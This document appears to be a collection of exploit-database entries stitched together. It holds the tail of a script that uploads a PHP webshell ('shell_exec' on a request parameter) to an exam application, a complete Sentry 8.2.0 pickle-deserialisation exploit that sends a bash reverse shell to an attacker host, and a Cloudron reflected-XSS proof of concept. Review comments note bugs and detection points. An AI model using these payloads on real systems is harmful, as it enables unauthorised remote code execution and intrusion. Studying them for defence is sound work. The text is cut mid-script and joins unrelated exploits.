        '<?php echo shell_exec($_REQUEST["cmd"]); ?>',
        'application/octet-stream',
        {'Content-Disposition': 'form-data'}
    )
}

# Defining value for form data
# NOTE: 'test_desc' is listed twice; a dict literal keeps the last value.
data = {'difficulty_id':'1',
        'test_desc':'CIVIL ENGINEERING',
        'test_desc':'CIVIL ENGINEERING',
        'test_subject':'Mathematics, Surveying and Transportation Engineering',
        'description':'Hello World',
        'option_a':'a',
        'option_b':'b',
        'option_c':'c',
        'option_d':'d',
        'answer':'A',
        'btnAddQuestion':'Save' }

filename = 'kh4waja.php'

#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
# NOTE: this path has no leading slash while webshell() prepends one, so the
# two URLs only line up when LINK ends with "/".
upload = s.post(LINK+'system/system/admins/assessments/databank/btn_functions.php?action=add', cookies=cookies, files=phpshell, data=data)
# NOTE: "" is a substring of every string, so this is always True; the
# success message below does not reflect what the server returned.
shell_upload = True if("" in upload.text) else False
u=shell_upload
if u:
    print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
    print(RED+"[-]Failed To Upload The PHP Shell!", RESET)

#Executing The Webshell
webshell(LINK, s)
# Exploit Title: Sentry 8.2.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 22/09/2021
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vulnerability Discovered By : Clement Berthaux (SYNACKTIV)
# Software Link: https://sentry.io/welcome/
# Advisory: https://doc.lagout.org/Others/synacktiv_advisory_sentry_pickle.pdf
# Tested on: Sentry 8.0.0
# Fixed Versions : 8.1.4 , 8.2.2
# NOTE : Only exploitable by a user with Superuser privileges.
# Example Usage : https://imgur.com/a/4w5rH5s
#
# Reading notes (review): Python 2 script (cPickle). It logs in with the
# supplied superuser credentials and submits an audit-log entry through the
# Django admin whose `data` field is a base64(zlib(pickle)) blob; the advisory
# linked above describes the server unpickling that field. Pickle is not a
# safe deserialisation format for data that crosses a trust boundary; the
# fixed versions in the header are the remediation. A superuser creating
# audit-log entries by hand through /admin/ is the event a defender can alert
# on.

import requests
import re
import warnings
from bs4 import BeautifulSoup
import sys
import base64
import urllib
import argparse
import os
import time
from cPickle import dumps
import subprocess
from base64 import b64encode
from zlib import compress
from shlex import split
from datetime import datetime

parser = argparse.ArgumentParser(description='Sentry < 8.2.2 Authenticated RCE')
parser.add_argument('-U',help='Sentry Admin Username / Email')
parser.add_argument('-P',help='Sentry Admin Password')
parser.add_argument('-l',help='Rev Shell LHOST')
parser.add_argument('-p',help='Rev Shell LPORT ',type=int)
parser.add_argument('--url',help='Sentry Login URL ')
args = parser.parse_args()

# None of the options are marked required, so any of these may be None.
username = args.U
password = args.P
lhost = args.l
lport = args.p
sentry_url = args.url

# Generate Payload
class PickleExploit(object):
    """Pickle gadget: unpickling reconstructs subprocess.Popen(self.args).

    ``__reduce__`` returns the callable and argument tuple the unpickler will
    invoke, which is the whole mechanism of the server-side bug.
    """
    def __init__(self, command_line):
        # shlex.split so the command line is passed to Popen as an argv list.
        self.args = split(command_line)
    def __reduce__(self):
        return (subprocess.Popen, (self.args,))

rev_shell = '/bin/bash -c "bash -i >& /dev/tcp/%s/%s 0>&1"' %(lhost,lport)
# Serialisation order: pickle -> zlib -> base64, i.e. the format the `data`
# field is sent in below.
payload = b64encode(compress(dumps(PickleExploit(rev_shell))))
print("\r\n[+] Using Bash Reverse Shell : %s" %(rev_shell))
print("[+] Encoded Payload : %s" %(payload))

# Perform Exploitation
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
# `request` is a Session, so cookies from the login carry over to later posts.
request = requests.Session()
print("[+] Retrieving CSRF token to submit the login form")
print("[+] URL : %s" %(sentry_url))
time.sleep(1)
page = request.get(sentry_url)
html_content = page.text
soup = BeautifulSoup(html_content,features="lxml")
# Assumes the first <input> on the login page is the CSRF token — not
# validated; a different page layout would send the wrong value.
token = soup.findAll('input')[0].get("value")
print("[+] CSRF Token : "+token)
time.sleep(1)

#Login
# Built but never passed to any request.
proxies = {
    "http" : "http://127.0.0.1:8080",
    "https" : "https://127.0.0.1:8080",
}
login_info ={
    "csrfmiddlewaretoken": token,
    "op": "login",
    "username": username,
    "password": password
}
login_request = request.post(sentry_url,login_info)
# Only the HTTP status is checked; whether 200 also covers a rejected login
# form is not established here.
if login_request.status_code==200:
    print("[+] Login Successful")
    time.sleep(1)
else:
    print("Login Failed")
    print(" ")
    sys.exit()

#get admin page
# Takes the host part of the login URL and always rebuilds it with "http://",
# regardless of the scheme that was given.
split_url = sentry_url.split("/")[2:]
main_url = "http://"+split_url[0]
audit_url = main_url+"/admin/sentry/auditlogentry/add/"

#request auditpage
date = datetime.today().strftime('%Y-%m-%d')
# NOTE: rebinds the name `time` to a string, shadowing the `time` module
# imported above; nothing after this line calls time.sleep, so it does not
# fail.
time = datetime.today().strftime('%H:%M:%S')
# Django admin "add" form for the audit log entry; the CSRF value is read back
# from the session cookie named 'csrf', and `data` carries the payload.
exploit_fields = {
    "csrfmiddlewaretoken" : request.cookies['csrf'],
    "organization" : "1",
    "actor_label" : "root@localhost",
    "actor" : "1",
    "actor_key" : " ",
    "target_object" : "2",
    "target_user" : " ",
    "event" : "31",
    "ip_address" : "127.0.0.1",
    "data" : payload,
    "datetime_0" : date,
    "datetime_1" : time,
    "initial-datetime_0" : date,
    "initial-datetime_1" : time,
    "_save" : "Save"
}
print("[+] W00t W00t Sending Shell :) !!!")
stager = request.post(audit_url,exploit_fields)
if stager.status_code==200:
    print("[+] Check nc listener!")
else:
    print("Something Went Wrong or Not Vulnerable :(")
  25. # Exploit Title: Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected) # Date: 10.06.2021 # Exploit Author: Akıner Kısa # Vendor Homepage: https://cloudron.io # Software Link: https://www.cloudron.io/get.html # Version: 6.3 > # CVE : CVE-2021-40868 Proof of Concept: 1. Go to https://localhost/login.html?returnTo= 2. Type your payload after returnTo= 3. Fill in the login information and press the sign in button.